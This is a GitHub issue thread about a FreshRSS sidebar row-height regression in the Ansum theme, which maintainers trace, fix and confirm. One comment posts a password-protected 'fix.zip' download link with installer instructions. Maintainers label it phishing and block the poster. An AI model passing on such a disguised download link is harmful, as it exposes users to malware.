### ISSUE TITLE
[Bug] row height of the left feed navigation bar changed a lot

### ISSUE THREAD

**Issue by toyo2333** [FreshRSS/FreshRSS#6735] opened 2024-08-26 06:25 UTC
### Describe the bug

The row height of the left feed navigation bar entry has gotten taller, not compact, not as good as the previous version kind. And it's not adjustable.

### To Reproduce

The row height of the left feed navigation bar entry has gotten taller, not compact, not as good as the previous version kind. And it's not adjustable.

### Expected behavior

The row height of the left feed navigation bar entry has gotten taller, not compact, not as good as the previous version kind. And it's not adjustable.

### FreshRSS version

latest

### Environment information

The row height of the left feed navigation bar entry has gotten taller, not compact, not as good as the previous version kind. And it's not adjustable.

**Comment by Alkarex** [comment] 2024-08-26 06:32
Hello,
Could you please provide a screenshot illustrating the problem?
Which FreshRSS theme are you using, and in what Web browser are you observing it?

**Comment by toyo2333** [comment] 2024-08-26 06:37
> Hello, Could you please provide a screenshot illustrating the problem? Which FreshRSS theme are you using, and in what Web browser are you observing it?

theme：Ansum —   Thomas Guesnon Thème sablonneux
OS：windows 11
browser：Chrome latest version
screenshot：
![111](https://github.com/user-attachments/assets/5a1e407d-d552-47bb-a08f-0c33f329ffa9)

**Comment by seeronline** [comment] 2024-08-26 06:39
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Frenzie** [comment] 2024-08-26 07:27
Either spam or a mistaken comment. I've hidden it for the moment because I don't know if deletion also deletes evidence.

**Comment by Alkarex** [comment] 2024-08-26 08:29
I have blocked that user (fishing link)

**Comment by Alkarex** [comment] 2024-08-26 19:57
@math-GH It looks like a regression from https://github.com/FreshRSS/FreshRSS/pull/6446

**Comment by Alkarex** [comment] 2024-08-27 21:57
@toyo2333 A fix https://github.com/FreshRSS/FreshRSS/pull/6740 has been merged in our `edge` branch. Could you give it a try?

**Closed as completed** 2024-08-27 21:56 UTC
Labels: Bug (confirmed) 🐞

**Comment by toyo2333** [comment] 2024-08-27 23:54
> @toyo2333 A fix #6740 has been merged in our `edge` branch. Could you give it a try?

i used docker to deploy freshrss 。i will wait for the image release

**Comment by Alkarex** [comment] 2024-08-28 11:26
You are welcome to use the rolling-release image `freshrss/freshrss:edge`

For another time, even with Docker, one can pick and test a PR before it is merged. Example:

```yml
  freshrss:
    image: freshrss/freshrss:6740
    build:
      context: https://github.com/math-GH/FreshRSS.git#fix-mapco-ansum
      dockerfile: Docker/Dockerfile-Alpine
    ...
```

* https://github.com/FreshRSS/FreshRSS/blob/edge/Docker/freshrss/docker-compose.yml
* https://github.com/FreshRSS/FreshRSS/blob/edge/Docker/README.md#build-custom-docker-image

**Comment by math-GH** [comment] 2024-08-28 18:10
> You are welcome to use the rolling-release image `freshrss/freshrss:edge`
> 
> For another time, even with Docker, one can pick and test a PR before it is merged. Example:
> 
> ```yaml
>   freshrss:
>     image: freshrss/freshrss:6740
>     build:
>       context: https://github.com/math-GH/FreshRSS.git#fix-mapco-ansum
>       dockerfile: Docker/Dockerfile-Alpine
>     ...
> ```
> 
>     * https://github.com/FreshRSS/FreshRSS/blob/edge/Docker/freshrss/docker-compose.yml
> 
>     * https://github.com/FreshRSS/FreshRSS/blob/edge/Docker/README.md#build-custom-docker-image

Do we have this information in our documentation?

**Comment by Alkarex** [comment] 2024-08-28 18:56
> Do we have this information in our documentation?

Only partially. I have been copy/pasting the same snippet in many PRs, and asked for someone motivated to write an Q&A on how to test PRs in different cases :-)

**Comment by toyo2333** [comment] 2024-08-29 00:53
> freshrss/freshrss:edge

i have tried freshrss/freshrss:edge，and confirm that the bug have beed fixed
